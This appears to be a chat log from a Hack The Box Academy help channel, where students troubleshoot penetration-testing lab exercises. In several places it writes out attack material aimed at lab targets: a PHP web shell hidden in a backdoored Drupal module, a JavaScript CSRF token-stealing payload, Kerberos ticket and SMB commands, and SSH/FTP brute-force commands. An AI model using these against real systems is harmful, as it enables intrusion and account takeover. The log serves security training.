msf > msfdb init
msf > db_connect -y /usr/share/metasploit-framework/config/database.yml
?

Good morning to all. I had yesterday an issue with curl and the page source not giving the same results. I found the reason it was because i was not using the correct request verb and request headers and data. i was bale to fix that. Now i am trying to download all potential files from the website with this script. Do you see why this code might not work? I have made executable and can run it but it doesn't do the wget to fecth the file. This is part of Web Attacks IDOR chapter first exercise.

#!/bin/bash

url="http://83.136.252.57:55322"

for i in {1..20}; do
for link in $(curl -s "$url/documents.php?" -X POST -d 'uid=$i' -H 'application/x-www-form-urlencoded' >
wget -q $url/$link
done
done

You're missing some closing parenthesis and semicolons

but then he is also missing this in the module description text. I think the wget parameters needs to be in quotes wget -q "$url$link" and i forgot for sure the Content-Type text in the -H flag

Hey guys. WTF, where is command line and menus...

I have nothing related to cmd in my pwnbox

you use the command line with the MATE terminal

I can't even paste here a screenshot...

Read and follow #welcome it also helps us help you by telling us what module and section you're doing

No, i mean the pwnbox is buggy

? I've had no issues launching terminal from pwnbox

This channel is for help with academy modules

sometimes it is, but thats usually to do with target machines not the box itself

https://snipboard.io/OyXQ2c.jpg

last time i checked pwnbox has MATE terminal on the top bar, the green square icon. just click it

Reach out to support

here

Refresh the page

Refreshed, nothing

Then reach out to support

They're the only ones that can help you

you should be able to right click on one of the borders and add a taskbar or something

My only other suggestion is resetting it

Okay, i will try to reset it

I thought HTB changed the design

Note if you're a free user you only get the 1 spawn per day

I've had no issues with Taskbar on this update

I have a student subscription

Okay, it works

Strange.

spawned weirdly ¯_(ツ)_/¯

Or the vnc drew the screen awkwardly

can anyone help me with LPE-logrotten section, ive completed all other sections and only left this...

cant really execute the payload and it didnt go to /etc/bash_completion.d

Check how the log is written

If the log is double quoted then I should use double quote for payload?

Tried using the sample payload and manual generated (rev shell and create file) but all failed

Do you have read and write permissions on the logfile

Yes

Hi how are you.
I am new and I am blocked with exercises in the modules.can anyone help me

What happened?

It is about nesus skills assessment

Hello anyone train me for became ethical hacker dm me

On file transfer module and I've been stuck on this issue for a few days now. I want to transfer a file from my host, to the remote host I've RDP'd into. There are 3 shares listed, C$, ADMIN$, and IPC$. I can only connect to IPC$, the C and Admin I get the error above, and I'm using the password and username provided by the module

Any idea what to do?

Could be a different pass

How did you paste the pass

CTRL+SHIFT+V

yes

Then you don't need the access if you don't have it

huh

Transfer it into the share you have access to

the IPC$ share is more of a protocol, it doesnt support file storage

so i can only use C and Admin

my question is if im doing it right, cause i know the answer is just drag and drop

but i dont want to do that

The answer is whatever is easiest to do

anyone
how to fix this timedout error

Hey dear hackers,
In what Linux package can I find the command snmpwalk ?

https://linux.die.net/man/1/snmpwalk

apt-get install snmp

anyone know where i can get PrinterSpoofer64.exe

i found the git for it but for the life of me i can't seem to compile it

is anyone able to provide some advice for the final optional exercise of Pass The Ticket (Linux)? i've proxied my traffic through MS01, and have got the ticket that i need onto my attacking machine (and converted from kirbi to ccache), but i'm struggling to connect to the "C disk". has anyone else encountered issues when they get to this stage?

Thanks sir, it works.
Sorry if I'm blind but is there anywhere on the man page that explains what package it comes from ? 🤔

https://github.com/dievus/printspoofer

legend!

what errors are you getting

the Kerberos authentication with 'user@WORKGROUP' to access 'IP' not possible kind

the command i'm using is:

smbclient \\\\IP\\C$ --use-kerberos=required --use-krb5-ccache=file.ccache -c ls -no-pass

Dont think that "user" has a share folder since he aint one.speaking from my memory

user would be my local username

i also tried using the -U flag on my smbclient command but got the same errors

Hi all, Has anyone here solved Mailing?

add the domain name, hostname and fqdn of dc to your hosts file

and use impacket's stuff, i.e. smbclient.py

iirc the user is also a domain admin so you can try psexec.py too

and is the "C disk" on MS01? or is it LINUX01?

Is he? I though we were talking about the service account?

At work so cant access my notes

the last optional question yeah? that's juilo's ticket

yeah that's the one

think there may be an issue with my proxy connection since i'm getting timeouts when i try to use impacket-smbclient through proxychains

@next bronze tf is this pfp

https://tenor.com/view/monke-uh-oh-stinky-uh-oh-stinky-monke-gif-18263597

what's your impacket smbclient command? did you add the things to your hosts file

Hey, in the Linux Fundamentals module filter content section. The exercise to find the unique path in the given domain address, i tried to use this command
cat h.txt | grep inlanefreight|awk -F 'www' '{print $2}'|tr "'" '"' |cut -d'"' -f1 |sort -u|wc -l
it shows 33 count but if i tried to use tr -d "'" (deleting the single quotes) instead of tr "'" '"' (replacing the single quote with double quote , which i got this from chatgpt) the count is now 34(which is correct answer). i dont know how, i mean both gonna achieve the same output since iam gonna cut the " double quotes in the further command. its pretty confusing, can anyone please share you're insight , i tried to ask chatgpt about this but i still cant get it ?

https://academy.hackthebox.com/achievement/1346583/143

yeah, my hosts file looks like this:

172.16.1.10 inlanefreight.htb inlanefreight dc01.inlanefreight.htb dc01
172.16.1.5 ms01 ms01.inlanefreight.htb
172.16.1.15 linux01 linux01.inlanefreight.htb

and my impacket smbclient command is:

proxychains impacket-smbclient -k -no-pass \\\\linux01.inlanefreight.htb\\C

now that is done, im off! really didn't expect to be up this late. night all

not the right syntax for impacket's smbclient, impacket's stuff use a standard syntax. also linux doesn't have a C drive

you're also missing the fqdn of the DC in your hosts file

oops, typos on both those fronts

for impacket with ccache, you can just do @<fqdn> -k -no-pass

brilliant, got connected. appreciate the assistance there

is there a way to get it working with smbclient? or is impacket just the best way to do it?

probably, but impacket has way more features and it's easier to use. and if you're messing with AD you will be using impacket in some why so why not just use the whole suite

true that. the syntax you just showed me there is way nicer to read

will definitely be noting that one down for the future

this question is making me go crazy any help, tips? i tried alot of fuzzing but to no result

Information Gathering - Web Edition Skill Assesment (updated version)

Module Windows Privilege Escalation
Skills Assessment Part 1

I am able to get nt authority on the machine but unable to find the ldapadmin password.
can anyone giveme hint on this

got it

got it too

lol

so what you upp to

Has anyone had it where they box will give you the answer when you click on it before you even attempt it?

hi all, anyone here done the hard skill assessment for Abusing Http Misconfigurations? Would appreciate some help, thanks

do we share HTB instance? because someone just sent a GET request to my web server 💀

like immediately

Password Attacks -> Network Services -> Question 1
Find the user for the WinRM service and crack their password. Then, when you log in, you will find the flag in a file there. Submit the flag you found as the answer.
https://academy.hackthebox.com/module/147/section/1327

Crackmapexec is not installed. I tried running it as root user and normal user
┌─[-@-]─[~]
└──╼ $crackmapexec
bash: crackmapexec: command not found

┌─[✗]─[-@-]─[~]
└──╼ $cme
bash: cme: command not found

I was able to install crackmapexec on my system and then use it. But shouldn't it be pre-installed on ParrotOS?

use netexec instead

Is crackmapexec deprecated now?

yep, netexec is the maintained fork

Thank you.

That was good

anyone can give me a clue on LPE - log rotten? tried to generate different payload still cant solve

🙏 thank you

I have a question about unzipping a file I'm worried it will be too big

So rockyou2024.txt.gz is 50mb but what happens if I unzip it?

It's 9 billion passwords

its just gonna be 400-500mb

nah wordlists of similar size are about 100 gigs

ooo the latest version i suppose

still need help w this

Any links to the new password list? No easy find googling.

It's on git hub

Just search rockyou2024.txt git hub

100 gb !

Can I search the compressed file the same way I would search the zipped file or no?

solved i hate this box so much

Like fir example let's say my password was football1234 and I go grep football1234 rockyou2024.txt would it find it in the compressed file the same way it would unzipped?

No

I'm only finding 2021 on github. Maybe it got nuked?

Hello, can someone give me some advice for the a report ? I’ve finished the enteprise attack module and I am trying to make my report, but there is few thing that I don’t understand

Hmmm is there a way I could unzip it somewhere else like an kali aws instance or something where I can get alot of storage space quickly "I dont think aws gives you that much memory "

A quick googling though and I found zgrep may have that capability -- to grep files in an otherwise compressed archive.

but, yeah, you could also use an S3 bucket too. Overhead of grepping compressed data or the network communication with S3 might be prohibitive. I've never tried either.

Awww sorry I do actually have 2021 not the new one lol I was trying to find it for ya

Thanks anyway. I'm sure i'll find it soon enough.

Thanks for the advice

In this lesson we are taught to disable restricedadminmode by adding a registry key so that we dont get an error when trying to authenticate to a host via RDP with a hash instead of a password, how can we disable it when we do not have access to the host in the first place?

I imagine that you can't. The described scenario might be nice if you had a foothold via, e.g., a webshell and needed to remote in with RDP. You are beyond me in the path, however.

yes right, this is possible if you have access to host via a webshell and this is like a fix in order to authenticate with rdp

get a shell, if you can modify the registry you're likely an admin. psexec is one way to do it

Right, thank you guys

how to fix this?

Afaik none of the modules require the new list

module PASSWORD ATTACKS , Password Mutations, first i use hashcat --force password.list -r custom.rule --stdout | sort -u > mut_password.list, and after this do hydra -l sam -P mut_password.list ssh://ip, but this is taking a very long time, I want to find out if my actions are correct so as not to waste time

i was attempting the RDP lab, im a little confused here, this statement says that an administrator hash is found from a different machine and we are asked to authenticate to the machine we currently have access to, how can two machines have same local accounts?

When I want to know if my syntax on a command is correct, I create a scenario where I already know the answer. You're beyond me in the path and I have little experience with hydra, but it looks like you're trying to brute ssh credentials. Setup a system to which you can SSH, then create a very small password list with one right answer. You can ssh into your own system which should make it easy if I accurately assessed that SSH is your target.

If it's hashcat your concerned about I can't help, but maybe you can apply the same principle in some way.

What mainly causes dissonance for me is that I have created a list with 93k passwords, and as usual in labs everything should be just to gain experience, as I think, but in this lab the whole point is then to waste time

Yeah it happens a lot. Like if you have a 100GB password list that'll take hours to complete but you mess up the hashcat command and you're trying against the wrong hash type. A synthetic test to ensure you have the right syntax will save your sanity.

You definitely don't want to churn through the whole thing and then think... "boy, did I issue the wrong command or is the password just not in that list?" 😬

don't use --force and there should be another service that you can bruteforece which will be a lot faster

Don't attack ssh

That wordlist size is fine

if im pivoting from a pivot machine to another network do i need to install the proxy at the first pivoting machine and agent at the second?

just u can just forward everything to the attacker machine

It depends

Does machine A have access to network B? Then no, you only need the agent on first and host on yours

If you need to access network C

You would set up a port forward that would chain the second agent back to your host

At least, with ligolo-ng that's all you need

(And setting up the simple routes)

but what if u need network B to access to network C

Firewall and IDS/IPS Evasion - Hard Lab .............. is the easiest lab ever but i forgot to put sudo and got stuck for 2 hours because i thought i was doing a technical mistake

do u chain the agent in network C to network B and further forward it back to host

with ligolo-ng

Ask, does Machine B have access to network C

Basically you keep moving up to the next machine that has access to the next network you need

yes

You'll generally have one less pivot than you will accessed networks

so basically u need to reinstall ligolo in machine b right

Just the agent

ooo thank you so much

Look up double pivot tutorials with ligolo

The agent on machine b should call back to machine a on a forwarded port, that forwards it back to your attack host

So a listener on port 4444 on machine A points back to your ligolo port on your attack machine

ooo i see thank you!

can somebody help me with this, thanks

What module?

"The RDP lab" isn't necessarily helpful

Most windows related modules/sections have rdp

Hi. bros. Can someone help with a question? Im at CBBH hacking Wordpress in the section "Login". Im trying to filter the results to xmlrpc with grep but I cant find a way. Can soemone give a me tip, pls?

Module - Attacking common services

What have yo tried

||<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>||

I did with burp. But I cant find a way to filter the results

I saw something like this ||<value><string>blogger.getUsersBlogs</string></value>||, but i get a error

I really dont know how to do it

yes, I finally found the password, I tried it through FTP, it works out much faster, we can conclude that if you have ssh and ftp, then it is better to choose ftp for brute force in order to find the password much faster?

Î found. If someone be stucked use cURL. I did not find a ay to grep the lines, im too dumb for bash LOL But i copied the the lines for the call and paste in texteditor and found the result

yes and no, people tend to use the password for everything so if you brute force ftp it will be faster but it is not a guarantee that it is the same pass for ssh but password re-use is a thing.

can someone help me out with this?

Sec

Hello there. I need some help with this section of the module. I tried gobusting the Target IP and got nothing, gobusting the URL gives errors. When I edit the host file to link the URL inlanefreight.htb to the target URL nothing works.

What's your /etc/hosts

It's not that they have the same local account, it's just that the company reused the same password for the local Administrator account on several machines.

The file you find is related to the administrator hash

I have it set up as 94.237.49.212:39715 inlanefreight.htb

Yeah that's wrong

You don't include the port in the /etc/hosts file

You specify the port in the http://domain:port

Thats right, which was found from a different machine, so im confused, how can two computers have the same local account

Of the connection/tool

Just don't overthink it

I also don't know what you mean "found on a separate machine "

cool thank you it's working now

The statement is saying they found another machine Admin account, not that they found the hash on another machine

they're not the same local account accounts, as @split glade said if the password is shared, then the hashes would be the same too

Module: Attacking Common Applications
Chapter: Attacking Drupal
https://academy.hackthebox.com/module/113/section/1209
I'm trying to upload a backdoored module, and it doesn't work for both vhost
My steps:

• wget --no-check-certificate https://ftp.drupal.org/files/projects/captcha-8.x-1.2.tar.gz; tar xvf captcha-8.x-1.2.tar.gz get the captcha drupal module and uncompress it
• echo "<?php echo '<br><pre>' . shell_exec(\$_GET['cmd']) . '</pre><br>'; ?>"> shell.php create web shell
• echo '<IfModule mod_rewrite.c>\nRewriteEngine On\nRewriteBase /\n</IfModule>'>.htaccess; cat .htaccess create .htaccess file, because drupal denies access to the modules folder by default
• mv shell.php .htaccess captcha; tar cvf captcha.tar.gz captcha/ move the 2 new files to the captcha folder, then recreate the module .tar.gz file with our backdoor
• LC Manage > Extend > "+ Install new module" (if you don't see the button for some reason, browse to $TARGET/admin/modules/install) > Browse > Select the backdoored Captcha archive> Install

Result:
http://drupal-qa.inlanefreight.local/admin/modules/install
Fatal error: Cannot use result of built-in function in write context in /var/www/drupal-qa.inlanefreight.local/modules/system/system.tar.inc on line 595
http://drupal-dev.inlanefreight.local/admin/modules/install
The website encountered an unexpected error. Please try again later.

I also tried:

• manually creating the shell.php and .htaccess files like in the chapter
• restarting the box
• installing the original captcha module, it doesn't work either

At this point I'm wondering if it's supposed to work? Just so I don't lose too much time on it

Hello Guys

Any tips with the last questuon of Kerberos Skills Assessment

I am on server01 with a**** user, trying to monitor with rubeus

coerce

tried

with printerbug

admin creds for drupal isn't given right? and the question also didn't ask you to do it so

and also relaying

you just need to coerce, it's not gonna be a computer account

yes i know, i saw the tip

The credentials are the first you would try, for both vhost

will rerty again with start from 0

Hey all, I think I'm being really dumb hoping someone can help me. I started the "Active Directory Enumeration & Attacks" Module

I've gotten to the point I need to connect from the ParrotOS box I'm given to the attack box

I don't see the IP address of this attack box anywhere

Am I missing something?

which section?

Initial Enumeration of the Domain
https://academy.hackthebox.com/module/143/section/1265

Scroll to the bottom, spawn the target, connect to the Linux attack host using xfreerdp and fire up Wireshark to begin capturing traffic.

I know the commands to connect via xfreerdp were given at the beginning, but nowhere am i seeing the bloody IP to use to connect to

I believe these sections give you 2 ips to use

But iirc it's on 172.16.5.225

There's one section that gives connection info for you to save

I could upload a backdoored module with https://ftp.drupal.org/files/projects/captcha_questions-8.x-1.3.tar.gz on drupal-dev.inlanefreight.local in the end >< so I guess the module was incompatible for some reason

I guess I'm blind

Connecting via FreeRDP
We can connect via command line using the command:

Introduction to Active Directory Enumeration & Attacks
adninja@htb[/htb]$ xfreerdp /v:<MS01 target IP> /u:htb-student /p:Academy_student_AD!

I have No IP to connect to

Rather this one:
adninja@htb[/htb]$ xfreerdp /v:<ATTACK01 target IP> /u:htb-student /p:

use the spawned target IP, that gets you to the "customer provided attack host" which bridges the 10.129.X.X and 172.16.X.X networks

MS01 is inside the "customer" network. You're supposed to go through the initial target as the "customer provided on-prem system"

I should be able to connect to this EA-Attack01 host right?

Yes

I don't see an IP for it

What fundamental thing am I missing

What section are you on?

Actual section name

https://academy.hackthebox.com/module/143/section/1265

I'm here where it wants me to connect to the attack host, and launch wireshark

"Initial Enumeration of the Domain"

did you spawn the target system near the questions at the end?

Make sure you read the name of the host that's spawned in the target

Ohhh wow thank you so much

That text is so small

I've been looking at this for hours

Depends on screen resolution

Also you don't need Wireshark, you can do it from an ssh session

Idek if rdp is running on the attack host

What is the API key the inlanefreight.htb developers will be changing too?

its in a vhost ?

Yes

You need to crawl for it

Unless you wanna spend an hour clicking links

And investigating source codes

Subdomains of subdomains exist

the problem is i cant fuzzing the vhost becouse i need add it in /etc/hosts

I kept thinking the parrot host I launched was what I needed. I'm probably in the minority here, but it would be nice if the text said:

Scroll to the bottom, spawn the target (This link is under the questions and is different from Parrot OS lab host)....

Thanks so much again I'm sorry I was that blind

I had no problem finding and adding vhosts after using gobuster/ffuf

You're given an initial domain to work off of: inlanefreight.htb

That's how academy works my guy

I'm a newbie to the academy, I really appreciate the help

Start Instance = pwnbox. In-browser vm

They should make intro to academy mandatory smh

the page has only
Welcome to inlanefreight.htb

i had crawl the page manual and with tools and idont find any thing

Well vhost enumeration it is then

I recommend going through all the questions if you're revisiting this module

The problem is that I have to put all the subdomains in /etc/hosts that I will use in wordlist.

No you don't

You use the wordlist to find what you put in the hosts file

I used seclist and nothing useful appeared

Subdomains-top1million-110000.txt, aka what was shown multiple times in the module

100 threads is safe to use and won't DoS the server

I used it and nothing useful appeared

re-read the gobuster section?

If using ffuf what's your command?

ffuf -u http://FUZZ.inlanefreight.htb:48935 -w /usr/share/SecLists/Discovery/DNS/subdomains-top1million-110000.txt

This is wrong

how it is wrong

To vhost fuzz with ffuf you need to do -H "HOST: FUZZ.inlanefreight.htb"

ohh

i forget it

thx bro

Your command only works if it's a public website

As subdomains might be hosted on other servers

Finally finished Active Directory Enumeration & Attacks, That 2nd skills assesment was a lot of fun and a great challenge apart from that one password.

That one password was tricky, but I guess it's a great lesson, maybe for the exam, and in a real environment

CWEE XSS&CSRF Section Bypass CSRF Via CORS

I have a current exfiltration and I dont understand why its not accepting my answer.

    // GET CSRF token
    var xhr = new XMLHttpRequest();
    xhr.open('GET', 'https://vulnerablesite.htb/profile.php', false);
    xhr.withCredentials = true;
    xhr.send();
    var doc = new DOMParser().parseFromString(xhr.responseText, 'text/html');
    var csrftoken = encodeURIComponent(doc.getElementById('csrf_token').value);

    // do CSRF
    var csrf_req = new XMLHttpRequest();
    var params = `promote=htb-stdnt&csrf_token=${csrftoken}`;
    csrf_req.open('POST', 'https://vulnerablesite.htb/profile.php', false);
    csrf_req.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
    csrf_req.withCredentials = true;
    csrf_req.send(params);
</script>"></iframe>

This is the paylaod for grabbing csrf token and exfiltrating, why might this be wrong?

NVM now its no longer exfiltrating, need some help / explanation

I am working on a course and ran into a confusing issue where the "question" is not an actual question and doesn't actually tell me what I should answer with, and all of the answers I can think of that make sense appear to be wrong.

The "question" is: The server above loads the flag after the page is loaded. Use the Network tab in the browser devtools to see what requests are made by the page, and find the request to the flag.

What exactly is it asking for? This is in the Web requests module, on the HTTP Headers section.

I have tried the flag name, just the alphanumerical portion of the flag name, the entire request, the type of request, and the full filename alone. I'm really rather lost.

check the hint, it's flag_...

Okay, so the answer appears to be the contents of the flag file. I had to get the flag number, then download and access the text file to get the answer. I feel like the question needs maybe a bit more detail? Or are the questions in HTB Academy usually that vague?

Because the previous questions were very simple and direct, then this one that wasn't even clear in what kind of answer it wanted.

you're probably overthinking it, the get request is to a url, copy and paste the url and it will show you the flag

yeah, probably. The hint made me think the answer had more to do with the flag than it did with the contents of the flag file. This is only the second module I've done on HTB so I'm not really in the flow of how they ask for answers yet.

if a flag is involved, most likely you want to submit the contents of the file containing the flag

Okay, thanks!

bro did u get this?

https://academy.hackthebox.com/module/110/section/1055 Final Question of this module, whenever I try to run my metasploit it gives me this error:

Read the question carefully for what you're meant to do

[You decide to capture the request sent by metasploit]

Yes you're going to get an error

I have it configured so that is should run through burp but no output

That's the point

Then you're missing something

Bc I had no issues getting burp to catch the request

Is intercepter turned on?

yes

And your proxies is set: HTTP:127.0.0.1:8080?

god dammit

It's set wrong

i need to fix my keyboard

It's not http://

Just http:

type:address:port

oh wait

``gobuster vhost -u http://inlanefreight.htb:48827 -w subdomains-top1million-110000.txt --exclude-length 301 -t 200

Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)

[+] Url: http://inlanefreight.htb:48827
[+] Method: GET
[+] Threads: 200
[+] Wordlist: subdomains-top1million-110000.txt
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
[+] Append Domain: false
[+] Exclude Length: 301

Starting gobuster in VHOST enumeration mode

Progress: 114441 / 114442 (100.00%)

Finished

`` why i can't find nothing? web gathering Skills Assessment

ok that fixed it

thanks again marcie

🫡

--append-domain

got it I will try it again

You also don't need to exclude anything

ok

hey everyone good morning!

anyone know why im getting no mysql in the sql injection module?

?

Gonna have to elaborate my guy

maybe havent had enough coffe haha

yea yea hol up

You mean in the pwnbox?

You can't post images here dude

oh haha ummm gettting bash: mysql: command not found

intro to mysql just at the start

thought it would be on the box?

If in pwnbox

For mysql please run the following
wget https://dev.mysql.com/get/Downloads/MySQL-8.0/mysql-server_8.0.35-1debian12_amd64.deb-bundle.tar
tar -xf mysql-server_8.0.35-1debian12_amd64.deb-bundle.tar
sudo dpkg -i mysql-{common,community-client-plugins,community-client-core,community-client,client,community-server-core,community-server,server}_*.deb

Something got messed up when they updated the pwnbox image

oh sweet thats all good though I was going crazy thank you!!!!

From Diablo, posted in the pwnbox channel (you'd have to read and follow #welcome to see it

For mssqlclient you need to run sudo pip install impacket --upgrade

awesome marcielee! thank u so much...:) i got it

Things are a bit broken

This is why I have my own vm

The only reason for missing tools is my own stupidity

ahhh i see my bad been offline for a bit trying to get back onto the grind

I have a couple of vms up but didnt know that you could vpn into acadamy?

Yeah there's a vpn config you can download

-_- all this time

Since always brother

shows what i know haha

glad i jumped on the discord 😆

well that was life changing thanks @fathom pendant

Just a note: don't use the pwnbox and vpn at the same time

good idea ill shut it down XD

Short answer: networking reasons

Longer answer: you get assigned the same IP and that causes collisions

Hey! Anyone here that might be able to help me with OWASP ZAP from the Intro to Web Proxies module? I can't even make a basic request and idk if it's me or if it's a technical issue. I'm frustrated and feeling like I'm just overlooking something simple.

send the error

send a screenshot

Make sure you're not using both burp and zap at the same time

yeah sounds like a misconfiguration related to the proxy

double check the browser proxy extension settings and burp proxy settings

I am not. I have a screenshot, in ZAP, the buttons that should be along the left and right side of the HUD are missing. I've tried resetting the instance but same thing happens. Where do I upload the screenshot? I thought there used to be an arrow but I don't see it anymore.

then you'll need to provide more information, such as what you mean by "can't even make a basic request" leaves a lot on the table as to what the root cause of the problem could be

you can upload screenshots here

Are you using the zap plugin?

You need the zap plugin to see the buttons

i hate that overlay i always turn it off asap

ohh new module heck yeah

Aside from the HUD, In the quick start panel, I enter the IP address given by the question and then click on “Launch Browser”. However, it fails to reach the target. I thought maybe it was an issue with the target IP so I tried another but still got the same result. The error is "Failed to attack the URL. Connection refused"

If you're not using the zap browser you're not gonna see the zap hud

Are you using http://ip:port?

What zap plugin? the HUD plugin for ZAP? I have that installed. I'm using the pwnbox

Http:// Defaults to 80, and if that's not running you'll get a connection refused

https, but yes. it keeps dropping the port though. I don't know why.

Don't use https

The targets give you a public_ip:port that are running http

It doesn't know to negotiate down the request to http

oh wow thanks! I just assumed it was https. I can access it now. thanks so much!

Unless explicitly told, assume http

I had no idea that was to be assumed. I would've thought it would be the other way around since https is used more. thanks again though

any ide why there are no buttons alongisde the left and ride sides of the hud?

Are you using the zap browser?

Yesterday when I was on the pwnbox the buttons were there, but today they are gone. Yes, I'm using the ZAP browser.

I did most with burp unless told to use zap ¯_(ツ)_/¯

you know, I was going to go with Burp, but being that ZAP is completely free, I figured it would be better to learn it instead.

https://stackoverflow.com/questions/67382134/how-to-enable-hud-in-owasp-zap-after-logging-in

Burp is also free

The HUD is driving me nuts! It's been giving me problems on the pwnbox and also on my own pc.

The only major annoying thing is speed

But imho using your own machine is gonna be a better experience

thanks for the tip. ZAP is outdated in pwnbox and I wonder if that's causing the issue.

appreciate your help though. thank you

Probably

I lost almost a whole day trying to get ZAP working between pwnbox and my own PC. Very frustrating.

It's why I prefer my own stuff, version control and such is a big factor

You don't need the HUD btw to do zap stuff

It just makes it slightly more convenient

I know, I just got caught up in trying to get it to work. I hate just giving up so I went down the rabbit hole.

On my own PC, I can't get the ZAP browser to launch at all and can't figure out why. I posted on their help forums and am hoping someone replies.

Try re installing zap

Likely missing some dependencies, if you launched zap via terminal you'll see the error in the terminal

This same thing happened to me too once and I uninstalled and reinstalled again and it worked

hmmm. I actually installed it in a Docker container. I removed and rebuilt the container many times before just giving up. I could try installing it directly on my pc I guess.

your docker could be missing the dependencies ¯_(ツ)_/¯

yep it very well could be

That's probably why

do you happen to know if ZAP is included with Parrot Security? I just installed it in a vm for HacktheBox and am wondering if it might work properly there.

I think so

It's not afaik unless the team included it in the latest base version. It is in the repos

yep, i just found it. thanks

Did you use the HTB specific version?

Yes. I haven't fresh installed the 6.1 version yet

And it's more of a theme than it is "htb specific"

The Security distro of parrot comes with zap pre installed apparently

do you mind if i ask one more question? In the lesson they say to "set the IP value on the page, then click on the Ping button." I cannot find a ping button in ZAP anywhere.

It's not in zap

This is what I installed, but I haven't played around with it yet.

Look at the webpage that's loaded

Oh! lol, my brain is fried. I should probably go to bed and start over again tomorrow haha

I think file inclusion has to have one of the best skills assessments I've done so far. Actually made me test almost everything in the module.

Most do

@fathom pendant you have an amazing memory!

Nah, I was just looking at that module as a reference to help

Most of my memory comes from reinforcing it through helping others

I've been through about a dozen modules so far and I know I'm going to have to go back and re-read them. The farther I get, the more I understand, and it just makes sense to go back again with a new perspective.

What path are you taking?

I was going to go down Pentester after finishing all the basic modules, but ended up detouring down Bug Bounty Hunter. My hope is I can put a few dollars in my pocket as I continue learning. What about you?

Same I am taking the CBBH path lol

oh nice! I just started, I think I'm on the third module?

I am on the first lol I started yesterday

oh well welcome!

i had a similar idea. though i was close to the web-related stuff in the CPTS path anyway, so I kept going

finished the AD attacks and enumeration last night, so today i'm now at the stage of the web related stuff, i.e. web proxy's

that being said ... im doing the Burp Intruder section right now, and the CE edition so very slow .... obviously to keep features for the Pro edition. will make this assessment slow lol

Yeah for big stuff that requires speed, ZAP

It's also good to bear in mind: patience

yea, i had a feeling. thats the next section. though so far i've had trouble following the instructions on ZAP as the module and my version of ZAP dont really match up

Yeah only slightly

I just matched "close enough"

Some ui stuff mixed around

definitely. its not like on a real world engagement youre gonna have a curated list to try that was designed to match the assessment youre doing haha

Even rl you won't always have a curated list

okay, one last question. we are directed to change the ip parameter from 1 to ls. But they are only showing how to do this using the HUD (which isn't coming up for me). How can I do this without the HUD?

I honestly don't recall how I did this

yea though at this early stage that is still confusing. its the same for Burp, its not all in the same places. And you easily get lost with assessments if you deviate from the steps they give you. so being extra cautious prob doesn't help

yea that was my point.

it's okay. i might just come back to it tomorrow. I can see the IP parameter I'm supposed to change, but it won't directly let me edit the field. I just need to do some more reading I guess.

Mm it's editing the html element

That's what it is

Yeah, I assumed I need to do that but I can't figure out how to edit it. LIke what button do I need to press, or what option do I choose.

they show how to edit it using the HUD, but of course, the HUD isn't coming up for me

I used burp for this. You can also likely inspect the request in the ZAP GUI

i thought i was going mad .... lol

It's also a byproduct of you being tired likely

I suggest setting this aside and getting rest

hello, where can i ask for help to answer a question?

Is it related to an htb academy module?

yes

Then right here lol

The channel aptly named "modules"

and marcie is our lead guru

im studying linux fundamental and have the question " What is the name of the config file that has been created after 2020-03-03 and is smaller than 28k but larger than 25k?"

I've been trying for a long time and I can't find the answer

Are you ssh to the target?

yes

Well it doesn't sound like it if you can't find the file

The provided sample command should work

thanks

i was putting -name *.config , but it is just conf

Yeah most config files are either .cfg, .conf, or .config

Didn’t work

ls

does this new module "API Attacks" comes under CBBH?

and what does replacing web services and api module means?

it's not under CBBH yet, and it means exactly that

it means it'll be replacing the Web Services and API module

https://academy.hackthebox.com/module/details/160 <-- this module

https://academy.hackthebox.com/course/preview/web-service--api-attacks

So It is not comes under CBBH yet but It will definetely comes

yes as a replacement to the above linked module

okay thank you

But I have completed CBBH
So why not it is unlocked for me?

Or It will unlocked only when it becomes as part of CBBH?

Should I unlock it through cubes or wait for replacement in CBBH?

you should unlock through cubes

as it's yet unknown when it'll be added as the replacement for it

but the exam is doable with the current module setup

so you're fine if you don't do it

fine
Understood

ZAP's request editor is Burp's equivalent of Repeater. find the request you want to edit, right click, look for edit in request editor.
fwiw, i've been using zap and burp CE interchangeably, and i find burp to be better. just the throttled speed is an issue during fuzzing. but for that purpose, there's always ffuf/gobuster.

is HTBA having issues starting up targets right now?

I cant ping any of them

Can anyone get my gf hacked insta back?

Information Gathering - Web Edition / Creepy Crawlies

it wants me to use a specific tool that i frankly can't get to work. ive done the installing of scrapy, the module works and all, but there is another error with scrapy (attached) that i can't bother to find out how to fix it. i installed scrapy through apt install python3-scrapy. i'ved looked through the code for ReconSpider.py and nothing about future stored report locations

<@&861185840277487616> ; No

Alr thanks

pip3 install scrapy

https://discord.com/channels/473760315293696010/1257062567965364334

also yeah the apt scrapy is behind

thanks a lot! abdz's fix works

if you installed scrapy via pip it works just fine

(you'd need to add --break-system-packages)

ah i should've done that

but also if you downloaded the ReconSpider tool a while ago (> like 3 days ago when Panda Updated) then it's the old version that wasn't fixed

what I did was just redownload and unpack it

but since you're using pwnbox it should be the fixed version

@hot owl I don't do private DMs; ask your question here

In reset password field
if you can send OTP to any user's email with just changing user id

what type of vulnerability is this ?

im doing the modules now, and i've been curious about the two. so far i'm finding burp to be more intuitive.

IDOR possibly

Same here

Pro is 500 so that may be an option for the future..but will definitely give both a fair shot.

Most modules focus on burp. At least in CWEE

Community is more than enough for most things

oh, good to know! im just doing the ones in the later half of CPTS but i plan on doing CBBH as well. and who knows, with more exp, CWEE.

Lots of cpts modules are in CBBH

yea it looks pretty good for a CE tbh.

usually your job pays for a pro license

So you will find that you got good progress on CBBH

for the moment, thats me 😩

and my old job would have never done that. they're cheap. unless the engagement specifically needed it haha

yea i saw a review that mentioned the same thing. which is great.

I’m more a web guy so I went for cwee after CBBH

there is also Caido to try, still in early dev but worth a try. https://caido.io/

I read about it before

I'm working on CBBH right now, cwee easy transition afterwards?

i could, but it will depend on where the work leads me. i'll eventually do it, tbh. just a matter of when.

CWEE requires more in-depth knowledge of coding

Transition yes, content wise, whole other level

i like the UI!

When the whitebox stuff starts indeed

python and bash for writing scripts or just reading?

Both

you'll need to craft your own custom exploits for the exam

yea i really gotta improve my code writing skills. lol

yeah because zap hurts the soul : )

and upload them with your report

C#, Java, Python, PHP and JavaScript

im glad i wasn't the only one who thought. i dont need a fancy UI, but ZAP really does hurt the soul at times .... haha

Does the cwee course cover the written scripts for all these to get a good understanding where to begin?

The courses often require a good understanding of the language

they are assuming basic mastery of the language

